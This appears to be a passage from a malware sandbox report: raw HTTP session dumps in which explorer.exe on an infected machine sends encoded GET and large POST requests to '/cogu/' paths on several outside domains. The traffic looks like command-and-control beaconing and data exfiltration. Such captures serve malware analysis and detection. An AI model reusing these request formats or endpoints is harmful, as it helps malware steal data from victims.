20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.11.20	49818	192.64.116.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:55.307637930 CEST	6548	OUT	GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1 Host: www.high-clicks.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:50:55.578366995 CEST	6549	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 13:50:55 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.11.20	49819	216.189.108.75	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:51:09.405009985 CEST	6551	OUT	POST /cogu/ HTTP/1.1 Host: www.tpmionline.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.tpmionline.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.tpmionline.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 66 37 4e 43 71 33 70 65 49 4f 6c 69 50 33 6e 34 71 78 5a 6b 64 6f 59 35 48 64 4a 72 38 69 42 4f 53 4e 4b 6b 37 4b 7e 67 59 5f 71 59 6e 6b 44 51 6f 2d 44 63 45 5f 47 6d 73 79 42 70 63 33 6e 43 45 59 73 58 4c 66 50 73 73 4f 41 68 65 53 58 32 4e 54 71 69 31 50 37 4d 44 65 6e 63 7e 69 41 69 31 50 61 57 69 65 42 39 58 51 7e 54 71 68 6c 46 55 4f 74 37 33 59 76 4b 30 4d 62 4e 43 6b 45 79 6a 4a 6c 36 7e 38 75 42 37 34 65 4f 52 6e 59 30 46 4d 58 5f 44 50 69 68 55 78 63 6a 6b 49 6f 57 7e 72 6d 31 47 57 75 62 51 70 42 42 45 7a 64 72 7a 67 4a 5f 37 62 6e 43 58 53 69 4e 4a 36 76 71 39 61 39 59 31 4e 31 63 59 56 7e 65 72 4d 30 74 28 54 36 57 45 6d 6e 4b 49 2d 6b 56 36 64 53 49 78 4f 53 46 54 48 55 4e 42 54 6a 38 6e 6d 77 44 32 72 46 63 34 53 57 44 33 6f 38 57 72 35 72 69 34 74 43 62 31 6c 56 38 72 52 6e 5f 30 47 77 65 6e 41 68 5a 42 71 6d 76 47 36 6d 4c 64 58 6c 71 53 69 77 52 54 4f 75 39 65 76 50 39 4d 74 5a 59 30 45 72 4a 64 53 45 32 44 45 43 59 54 74 64 48 71 41 49 41 37 77 5a 48 34 46 33 47 79 71 44 30 52 62 4a 4d 33 6d 61 56 33 4d 54 76 4c 44 47 4c 41 70 6a 47 6f 63 59 50 4a 2d 67 6a 52 4c 59 5f 70 35 46 51 28 5a 30 4f 59 33 34 38 68 41 56 53 55 37 63 77 30 48 71 70 56 44 5a 31 4c 5f 45 34 6a 76 53 4d 6c 4d 68 64 70 30 6d 6f 6f 4c 43 56 31 39 36 38 78 78 59 39 4d 55 28 46 58 78 7e 56 42 6c 39 4e 64 49 6c 6e 42 58 6e 7a 30 6f 58 68 62 79 4a 6e 44 76 66 77 72 72 37 78 6f 63 47 41 71 39 53 67 37 2d 5a 78 73 41 57 6d 28 56 6a 48 49 55 37 30 75 56 6a 39 48 53 7e 59 32 31 64 48 67 64 45 61 39 56 34 61 58 58 39 44 6c 43 63 58 46 69 38 35 4d 32 38 6a 4f 45 72 4f 44 72 52 39 4b 4d 49 55 47 32 45 4a 31 77 72 39 58 42 46 58 58 4d 7e 37 6e 63 36 53 7e 6f 53 39 45 5a 65 74 47 39 6c 31 33 31 5a 55 71 65 44 43 42 65 39 56 74 54 36 75 75 66 41 78 66 78 52 34 51 73 65 31 42 45 66 6b 56 47 51 62 4d 54 75 78 6c 59 6d 5f 71 59 44 4b 36 51 33 76 7e 35 5a 37 38 4d 39 51 4f 5a 36 7a 4e 2d 47 37 4a 78 71 59 44 6e 75 73 77 4d 42 37 37 58 69 41 57 74 78 71 47 31 74 6b 6e 72 69 45 58 4b 77 39 6c 50 61 34 69 66 6f 68 69 4f 45 67 6f 35 6e 4a 51 52 5a 57 70 43 4f 32 6c 70 70 63 47 4a 75 61 49 41 66 6a 57 78 43 50 75 4b 31 73 5a 4d 4f 47 65 39 53 75 4f 7a 37 4a 50 58 48 4f 74 74 77 6a 43 52 50 74 37 44 46 75 28 47 59 49 4d 34 32 68 68 66 36 2d 64 75 36 6e 7e 4a 78 47 32 79 70 66 61 6a 48 30 34 36 75 49 63 7a 64 57 7a 54 4e 70 4f 78 61 69 48 4e 41 58 67 38 47 68 6a 70 41 6f 28 5a 73 35 28 6c 31 73 4a 72 6a 67 4f 76 50 31 39 63 76 50 59 50 34 32 61 43 59 59 51 32 57 78 62 33 67 48 47 37 46 31 70 77 4b 33 71 50 67 35 64 6e 7a 55 59 7a 76 72 57 73 7e 6e 7a 57 50 69 67 4e 68 56 46 30 79 6b 64 6a 31 4b 67 59 59 2d 56 74 4b 52 61 32 7a 58 76 6b 61 4c 62 53 74 61 34 4d 58 6b 41 65 37 6c 33 46 4a 6d 57 71 34 31 51 77 51 77 78 41 71 64 37 45 68 49 4d 62 64 77 70 77 6d 73 7a 4e 74 53 75 74 48 5f 34 64 Data Ascii: E6=f7NCq3peIOliP3n4qxZkdoY5HdJr8iBOSNKk7K~gY_qYnkDQo-DcE_GmsyBpc3nCEYsXLfPssOAheSX2NTqi1P7MDenc~iAi1PaWieB9XQ~TqhlFUOt73YvK0MbNCkEyjJl6~8uB74eORnY0FMX_DPihUxcjkIoW~rm1GWubQpBBEzdrzgJ_7bnCXSiNJ6vq9a9Y1N1cYV~erM0t(T6WEmnKI-kV6dSIxOSFTHUNBTj8nmwD2rFc4SWD3o8Wr5ri4tCb1lV8rRn_0GwenAhZBqmvG6mLdXlqSiwRTOu9evP9MtZY0ErJdSE2DECYTtdHqAIA7wZH4F3GyqD0RbJM3maV3MTvLDGLApjGocYPJ-gjRLY_p5FQ(Z0OY348hAVSU7cw0HqpVDZ1L_E4jvSMlMhdp0mooLCV1968xxY9MU(FXx~VBl9NdIlnBXnz0oXhbyJnDvfwrr7xocGAq9Sg7-ZxsAWm(VjHIU70uVj9HS~Y21dHgdEa9V4aXX9DlCcXFi85M28jOErODrR9KMIUG2EJ1wr9XBFXXM~7nc6S~oS9EZetG9l131ZUqeDCBe9VtT6uufAxfxR4Qse1BEfkVGQbMTuxlYm_qYDK6Q3v~5Z78M9QOZ6zN-G7JxqYDnuswMB77XiAWtxqG1tknriEXKw9lPa4ifohiOEgo5nJQRZWpCO2lppcGJuaIAfjWxCPuK1sZMOGe9SuOz7JPXHOttwjCRPt7DFu(GYIM42hhf6-du6n~JxG2ypfajH046uIczdWzTNpOxaiHNAXg8GhjpAo(Zs5(l1sJrjgOvP19cvPYP42aCYYQ2Wxb3gHG7F1pwK3qPg5dnzUYzvrWs~nzWPigNhVF0ykdj1KgYY-VtKRa2zXvkaLbSta4MXkAe7l3FJmWq41QwQwxAqd7EhIMbdwpwmszNtSutH_4d
Oct 13, 2021 15:51:09.405057907 CEST	6555	OUT	Data Raw: 54 47 4b 67 43 64 75 57 79 46 5a 74 35 77 6e 68 28 6b 57 56 34 34 61 4f 4f 43 78 74 44 69 6a 50 4a 78 47 6d 55 64 75 53 57 70 34 68 64 42 67 38 57 5a 6b 6b 6a 65 46 31 63 5f 65 74 79 7a 47 6e 68 62 61 4e 4b 67 6f 7a 30 70 5a 43 78 38 56 70 42 41 Data Ascii: TGKgCduWyFZt5wnh(kWV44aOOCxtDijPJxGmUduSWp4hdBg8WZkkjeF1c_etyzGnhbaNKgoz0pZCx8VpBAVeGjD_mGubpD7Gu3U_nDWXqYJWPpVuWiHXqkiHVRcrm3UMAcPPow~_9wiDrSimrCTb~OaBoBs9ESKu2wqwPrX4w8PvcvuOt91GnTUJA5bP9o~Vd11r7duz(3Mp6bsuu-FXgcmxGYRRutAJk1PQx-rAzr5dMNJ1t55
Oct 13, 2021 15:51:09.405106068 CEST	6557	OUT	Data Raw: 31 58 4c 69 6a 43 47 2d 49 6d 30 61 64 51 62 6d 51 47 4b 77 38 43 44 4a 65 77 37 45 38 39 42 7a 72 53 7e 42 56 64 49 59 44 57 5a 38 34 5a 6b 7a 46 30 47 54 6c 39 75 45 4a 32 44 6a 38 54 43 59 67 75 41 38 28 4d 44 6b 78 6f 6e 6d 77 53 56 67 63 6c Data Ascii: 1XLijCG-Im0adQbmQGKw8CDJew7E89BzrS~BVdIYDWZ84ZkzF0GTl9uEJ2Dj8TCYguA8(MDkxonmwSVgclWZVFKmVxqNrlhrrr5jHBLxo8tHwaBwytZCgk(O(jQzBDtVk7YfeWTOYhZ3xWqbn-nDrcma5X0wAwXrcWnrYKJuD34dWhWM1FbIykWxUSzsDG18QXPdIc9mcoC-vtvthMno0eVVJyukcmyHo1jE6QeQYVyjznyO829
Oct 13, 2021 15:51:09.550007105 CEST	6560	OUT	Data Raw: 64 65 6f 66 35 54 4c 64 6b 53 58 73 35 73 73 69 54 33 73 41 63 68 31 4c 62 2d 7e 35 79 45 30 36 6b 31 28 30 57 2d 5a 49 7a 69 4f 52 57 55 58 33 32 76 6c 37 4f 61 52 32 30 4d 38 52 66 51 59 53 71 4f 76 70 77 61 6b 47 69 34 75 78 54 50 6a 5a 68 46 Data Ascii: deof5TLdkSXs5ssiT3sAch1Lb-~5yE06k1(0W-ZIziORWUX32vl7OaR20M8RfQYSqOvpwakGi4uxTPjZhFW84b9bqk633GhWB2OP8nZWofosThpsqD2sJzDiuK3fqvhalbdQgqBDg6JTuSvi8PXavhPf2FMBQ_FNAP7bS3awbeIy6kY3W88NEj8QfSnA9yoRE5Gvm9wrNWytUDIn0faaeHJFsrrID0mDEMebFqS0CCFWycn4S7n
Oct 13, 2021 15:51:09.550209045 CEST	6568	OUT	Data Raw: 76 54 39 52 37 79 67 4e 49 2d 6b 41 53 33 6a 37 37 46 46 4b 75 66 41 4c 70 37 70 52 4f 6c 52 2d 32 33 63 4e 4c 46 56 56 38 55 4e 79 70 6e 56 38 70 62 6a 6c 79 45 49 5f 65 70 73 62 74 4a 56 72 58 61 38 6d 56 5a 57 43 67 77 6f 7a 38 75 50 72 38 50 Data Ascii: vT9R7ygNI-kAS3j77FFKufALp7pROlR-23cNLFVV8UNypnV8pbjlyEI_epsbtJVrXa8mVZWCgwoz8uPr8Px3QL1y7GqpfdS1s4I2RxwlB6j8mWDpgvn63yV6fz0bo166HEDZSc4oV2OyUZl3c189W0bro1jRK7z65lUwO6j5vujVpiwfigDrs3LrVBd1yRwUZhjvXstXGWAU5UK9ypwHvGZOTjwdYllHY3bFdHwX7SBIg5QfP8R
Oct 13, 2021 15:51:09.550357103 CEST	6576	OUT	Data Raw: 50 58 4e 52 50 4f 50 73 6b 6b 55 7a 4c 64 6f 45 56 6d 6d 51 58 46 4d 73 30 57 76 47 4c 6a 70 46 67 68 50 4f 71 49 6a 6d 38 65 31 4b 75 69 61 78 77 76 35 50 28 37 6d 39 70 34 78 52 66 58 38 4e 35 4a 4d 76 76 76 75 46 6e 32 6d 56 69 37 73 78 76 4a Data Ascii: PXNRPOPskkUzLdoEVmmQXFMs0WvGLjpFghPOqIjm8e1Kuiaxwv5P(7m9p4xRfX8N5JMvvvuFn2mVi7sxvJqpM2fazvce3-jYazxvrqyzUBBSpKjpyx(nj1cM2CloQDYQKhUxfB5skH0sBKLFVFlLi4krCDQu3_kuidQBSlTAR1cqDl6LIkPN0OHRVithNvJwkLTeBCLDqONnJbbGoERcr7aF6_gHpgc4Vl(HjnA1MT0CRyeV4MY
Oct 13, 2021 15:51:09.550527096 CEST	6579	OUT	Data Raw: 64 69 64 4e 47 39 4c 4d 36 4d 51 4d 39 75 33 43 66 7a 73 53 61 79 47 58 74 35 56 58 7e 78 77 67 37 34 28 62 61 58 76 37 59 31 35 4c 71 75 6c 66 77 43 57 4f 73 42 78 71 33 36 6a 2d 64 4e 73 7a 63 65 43 6c 4c 57 34 30 64 50 36 4a 43 53 51 59 63 75 Data Ascii: didNG9LM6MQM9u3CfzsSayGXt5VX~xwg74(baXv7Y15LqulfwCWOsBxq36j-dNszceClLW40dP6JCSQYcu9yYCTSV32Fght6BCe748BiQgEqSgcMmaPwn-y3yqXEZafszJcOx1yq7n34SlADrHMDGvYbAsBG8g1ocUVNXwSCuxmR3cvWspRWS3j6JUV5j2edQM5lWnZOKkvbf83CkDmpdFJ_BpiXSPnzuabNfhF4QeXWL3avco4
Oct 13, 2021 15:51:09.695353031 CEST	6582	OUT	Data Raw: 75 48 53 5f 5a 6b 30 66 74 69 31 4a 59 72 4d 6c 45 44 4b 36 52 50 39 4c 31 54 57 4f 4b 68 72 34 31 57 33 53 67 69 6b 76 66 49 65 4e 51 61 4d 35 4f 34 76 6c 50 65 64 65 4b 68 5a 77 45 38 77 33 55 77 56 73 72 45 69 72 6b 33 6b 61 73 4a 51 45 56 52 Data Ascii: uHS_Zk0fti1JYrMlEDK6RP9L1TWOKhr41W3SgikvfIeNQaM5O4vlPedeKhZwE8w3UwVsrEirk3kasJQEVRRhFJvMz4ThAX7I1xLvBF0iGuMPcYwkfUf4dpmG2YehYBbTMBRugAk8vyp1sIv8AoTqciODZd4oYdnmk0g6NE7inuj97UYzegFlthW1fygF4DdW(Wnie9fGznHvtkCumESSYQZ87xGs~EgEgD4X79jfzkiAp-dWKro
Oct 13, 2021 15:51:09.695519924 CEST	6590	OUT	Data Raw: 6a 37 41 54 51 5f 78 71 30 69 4f 51 70 62 58 72 70 6c 49 5f 33 37 78 50 30 30 72 75 4f 33 37 65 72 78 34 76 55 63 66 63 58 69 55 44 64 78 51 55 62 49 41 46 4e 4b 62 49 4c 67 66 38 65 31 38 54 62 53 6e 68 33 67 6e 76 4e 70 6b 68 53 4f 72 35 4f 5a Data Ascii: j7ATQ_xq0iOQpbXrplI_37xP00ruO37erx4vUcfcXiUDdxQUbIAFNKbILgf8e18TbSnh3gnvNpkhSOr5OZxxLDOQae0AoSrcVkNu63GtnZTOmWuFTz(2WJltUb7EgwfdqQjIuLCTfrCirjPBeZbvDuqTsMcq31wd8S4fU9Vtda688lq1hgnYl67-ws3y6wRHSAa08VkUAuR36IiQ8zMKcv8qOMqjtdJRy-u5P0whyx5OZhrrSiR
Oct 13, 2021 15:51:09.695698023 CEST	6598	OUT	Data Raw: 43 79 36 6c 51 45 41 57 69 37 4d 75 44 75 72 58 32 49 46 61 38 70 6f 47 43 75 6a 32 5a 4d 6b 44 4a 2d 43 5a 6a 75 67 36 58 53 71 50 45 67 63 63 4f 4e 44 51 54 45 63 79 78 5a 6d 32 44 79 34 79 36 70 4c 64 66 6c 57 47 54 47 78 53 4a 44 44 66 35 53 Data Ascii: Cy6lQEAWi7MuDurX2IFa8poGCuj2ZMkDJ-CZjug6XSqPEgccONDQTEcyxZm2Dy4y6pLdflWGTGxSJDDf5SuAkthOMZdjSMaR(pHzeou49duEoPbBNQq2WcjV~3BwH_L8k54ODuV2YPABHVZ6u3NCbCWz8L3aptqN04q4XxtKdLsEJQQ9BwEizN9ANVAhy3TJ2D9LZUnZHNJN60DufIa0K8XUyw(kLbOwrqEO1tvLzVojLwinSTY
Oct 13, 2021 15:51:09.695882082 CEST	6619	OUT	Data Raw: 72 5a 66 61 32 4e 33 6e 7a 74 48 71 30 32 42 7a 50 37 30 50 51 6a 43 7a 71 46 70 4d 65 39 47 57 68 36 32 31 38 6f 42 55 34 45 4d 6d 6a 6b 62 45 41 59 28 48 55 6f 42 47 6d 75 64 50 5a 45 70 74 72 6e 54 42 4f 43 76 38 43 6e 4a 50 77 6f 4a 4c 73 4a Data Ascii: rZfa2N3nztHq02BzP70PQjCzqFpMe9GWh6218oBU4EMmjkbEAY(HUoBGmudPZEptrnTBOCv8CnJPwoJLsJx2OKKoUNjDNj(WfqkP3ugzrq(VK_B_kwFvqBUexj2DbqaGufDiaOmUsygeLiIXDwRwFSkYYpWsxXjayBUNkO79vBgGGfKxOjkK3q3GNFevrBfkpZjIu_loSQ2MpJQUf8rbHRAdTLR6pC24X3flAmos(DvJJzIEkQo
Oct 13, 2021 15:51:09.991575956 CEST	6682	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 21:51:09 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Status: 304 Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.11.20	49820	216.189.108.75	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:51:09.550587893 CEST	6579	OUT	GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1 Host: www.tpmionline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:51:09.698191881 CEST	6621	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 21:51:10 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Status: 304 Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.11.20	49821	199.34.228.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:51:14.870745897 CEST	6685	OUT	POST /cogu/ HTTP/1.1 Host: www.shopsharpgraphics.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.shopsharpgraphics.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.shopsharpgraphics.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 7a 35 75 32 69 6b 49 35 4f 46 74 41 49 76 31 76 35 72 52 51 5a 75 67 56 43 6f 74 71 74 52 65 52 48 61 65 30 5a 49 36 73 4f 33 28 48 4e 63 6f 39 74 74 45 67 6a 51 6c 39 6c 79 79 55 59 5f 43 4e 36 62 53 6f 46 75 54 49 6a 49 62 58 6d 4b 7e 31 59 30 35 4c 32 50 6b 6b 79 34 54 4b 75 62 4f 4c 6d 7a 72 4e 6e 30 43 30 35 52 68 56 72 33 6f 33 7e 32 38 57 61 61 74 79 6b 77 36 31 62 43 6e 6d 4a 37 7a 56 39 53 45 5f 6f 59 61 42 78 63 69 7a 59 5a 46 62 53 63 67 6c 49 76 51 55 4f 34 6a 7a 56 72 44 54 43 4b 35 4b 33 34 44 4e 72 2d 55 49 4d 4f 43 78 57 55 73 5f 74 52 76 6f 6d 56 4d 6d 58 59 55 6d 73 55 47 45 6a 51 58 38 53 68 31 67 56 6c 6a 4b 38 32 63 51 76 49 4f 64 63 39 66 32 31 73 47 37 30 34 6f 53 52 49 78 4c 46 5f 5a 70 30 76 6f 4a 78 41 72 64 33 69 63 58 30 39 62 79 43 42 44 62 6c 76 68 6c 43 6c 54 59 41 61 74 52 47 75 37 42 46 6b 5a 62 28 6e 56 54 66 4f 52 35 37 53 43 6f 70 59 67 50 75 6f 7a 72 6e 5f 32 6f 41 36 48 32 70 74 6e 55 59 53 70 70 77 5f 51 59 77 4b 63 74 6e 75 48 50 6a 6a 66 34 48 52 35 30 71 4b 4f 46 7e 39 52 68 52 46 77 56 4a 56 56 39 65 6e 79 36 65 39 66 34 44 32 34 7a 35 30 55 72 57 4a 64 47 6e 50 67 57 50 44 34 45 39 6d 28 5a 72 64 52 47 56 32 41 41 63 4b 54 7a 79 4b 62 58 6d 50 73 69 41 6c 67 7a 36 72 36 79 58 50 39 6f 74 34 4f 51 65 34 31 62 56 57 4f 59 61 41 34 46 4d 57 68 64 57 76 73 38 58 33 56 55 4c 6b 32 4e 28 72 51 56 6c 78 6c 6d 37 58 66 6f 57 71 74 79 70 71 38 51 55 4f 6f 39 31 77 36 55 51 6e 62 62 6a 56 49 78 4f 2d 33 66 49 71 6a 4a 42 45 54 54 45 66 39 66 63 6f 43 51 6b 42 75 59 41 79 6c 69 30 6a 69 30 77 6d 79 47 34 79 75 58 6e 2d 33 5f 6c 76 6b 31 47 31 6d 6f 31 6e 65 4e 36 56 4a 4e 34 39 30 73 49 48 59 42 35 44 6d 44 7a 37 39 6e 49 6b 48 56 48 66 78 47 6d 43 4b 51 56 53 6e 6c 78 2d 59 62 39 76 72 44 56 76 73 6a 42 49 35 45 66 62 48 51 30 77 37 37 46 4b 30 42 38 35 41 4c 6a 43 34 48 33 79 6e 45 61 47 58 5f 41 4f 46 5a 43 77 77 4a 66 73 73 2d 44 52 7a 6b 42 74 33 57 47 7a 61 67 7e 41 4a 5a 77 77 43 78 78 34 39 45 57 31 30 65 36 4b 7a 71 79 42 7a 6a 30 6c 47 56 6e 42 72 4a 4b 4f 59 4d 4c 4e 35 76 4f 65 71 7a 28 70 73 30 76 64 6f 56 4e 33 39 6a 76 62 62 69 72 75 28 73 55 50 35 70 65 58 36 74 6c 4a 41 43 53 67 72 54 7a 5f 41 4b 37 51 32 6b 48 4c 64 59 68 70 73 4a 43 53 69 7a 79 34 58 46 7e 55 59 73 55 77 6f 64 4c 6d 39 4d 4c 4d 44 55 38 4e 31 5a 47 72 61 51 36 41 6d 42 46 31 72 44 28 64 42 44 37 57 70 39 36 49 36 71 73 4e 51 76 6d 39 79 63 6f 42 62 58 64 45 30 55 7e 35 61 76 38 63 4d 62 31 2d 33 37 49 49 70 62 51 72 72 39 68 5a 6e 32 51 4b 61 31 78 6e 67 74 41 33 6c 4c 56 4c 58 51 48 41 69 77 65 4f 4f 68 64 64 45 35 74 73 68 6d 57 4e 75 57 49 31 79 71 61 72 34 50 34 31 7e 51 6a 75 61 47 73 30 51 64 6c 62 79 5f 6c 30 4a 6a 45 68 61 69 59 63 45 56 6b 68 77 52 75 48 35 64 4b 50 4e 49 71 34 54 58 72 6e 54 49 71 4b 75 68 68 57 64 54 51 68 4f 54 6f 66 72 36 4e 35 6e 65 72 66 6f 32 4d 6f 37 37 58 67 57 56 78 5f 4e 67 64 76 74 48 33 38 78 55 6e 6a 5a 4e 43 36 61 67 65 30 54 71 32 56 58 47 73 33 6e 57 53 58 54 35 36 4a 66 42 4b 52 4c 49 28 73 4f 77 35 4d 76 32 6a 42 35 57 75 42 4b 63 6d 6e 45 4a 4b 56 79 6d 74 47 4a 78 67 37 7e 50 43 50 6d 62 72 39 53 2d 45 45 74 56 79 72 4e 37 31 48 44 58 6b 65 76 5a 37 65 4f 76 42 57 32 6c 32 39 51 7a 49 32 37 5f 6a 79 37 51 4e 31 6e 39 4d 59 4f 4c 75 77 43 5f 58 62 50 45 6e 7a 75 45 68 36 6b 6c 75 71 31 6e 79 73 4d 66 30 33 41 34 41 64 71 65 66 79 4f 6d 5a 41 41 4c 44 46 6e 77 49 38 75 69 42 52 41 47 38 41 49 75 6d 71 75 54 74 55 70 51 50 69 7a 7a 6d 74 64 73 30 64 4b 4d 38 5f 53 61 28 58 39 34 43 4a 43 74 57 6a 43 6b 47 31 4f 4a 32 34 66 37 70 6a 49 55 77 42 65 45 71 77 53 62 61 67 76 77 4c 78 48 70 5a 63 4d 56 67 73 4b 75 56 78 4f 48 72 42 44 71 73 66 43 63 34 71 4a 51 36 31 70 75 35 76 7a 7a 4f 4d 4d 63 49 4d 45 41 4f 55 54 74 32 42 42 59 4d 73 74 62 6c 63 44 58 4e 31 61 68 48 50 66 54 35 4d 31 33 4c 51 7a 4d 42 4b 61 54 4c 4f 53 64 55 62 39 58 56 71 4e 68 36 33 7a 5f 4d 73 61 45 41 56 41 64 59 79 6d 74 37 78 74 71 45 39 78 66 69 33 4e 41 4c 73 56 34 37 63 43 66 70 31 62 52 72 6d 4e 30 73 45 58 70 57 35 63 4a 44 48 46 4a 28 7a 31 5a 42 6d 61 49 56 4f 28 58 Data Ascii: E6=z5u2ikI5OFtAIv1v5rRQZugVCotqtReRHae0ZI6sO3(HNco9ttEgjQl9lyyUY_CN6bSoFuTIjIbXmK~1Y05L2Pkky4TKubOLmzrNn0C05RhVr3o3~28Waatykw61bCnmJ7zV9SE_oYaBxcizYZFbScglIvQUO4jzVrDTCK5K34DNr-UIMOCxWUs_tRvomVMmXYUmsUGEjQX8Sh1gVljK82cQvIOdc9f21sG704oSRIxLF_Zp0voJxArd3icX09byCBDblvhlClTYAatRGu7BFkZb(nVTfOR57SCopYgPuozrn_2oA6H2ptnUYSppw_QYwKctnuHPjjf4HR50qKOF~9RhRFwVJVV9eny6e9f4D24z50UrWJdGnPgWPD4E9m(ZrdRGV2AAcKTzyKbXmPsiAlgz6r6yXP9ot4OQe41bVWOYaA4FMWhdWvs8X3VULk2N(rQVlxlm7XfoWqtypq8QUOo91w6UQnbbjVIxO-3fIqjJBETTEf9fcoCQkBuYAyli0ji0wmyG4yuXn-3_lvk1G1mo1neN6VJN490sIHYB5DmDz79nIkHVHfxGmCKQVSnlx-Yb9vrDVvsjBI5EfbHQ0w77FK0B85ALjC4H3ynEaGX_AOFZCwwJfss-DRzkBt3WGzag~AJZwwCxx49EW10e6KzqyBzj0lGVnBrJKOYMLN5vOeqz(ps0vdoVN39jvbbiru(sUP5peX6tlJACSgrTz_AK7Q2kHLdYhpsJCSizy4XF~UYsUwodLm9MLMDU8N1